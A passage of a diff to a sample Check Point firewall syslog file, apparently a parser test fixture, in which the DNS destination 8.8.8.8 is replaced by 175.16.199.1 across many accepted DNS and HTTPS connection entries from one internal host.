+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38377"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503724"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34858"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53160"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddec,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44804"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddee,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56900"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56900"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38570"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47035"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56374"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47035"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51572"; service:"443"; service_id:"https"; 
src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44102"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58828"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44102"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53168"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38311"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & 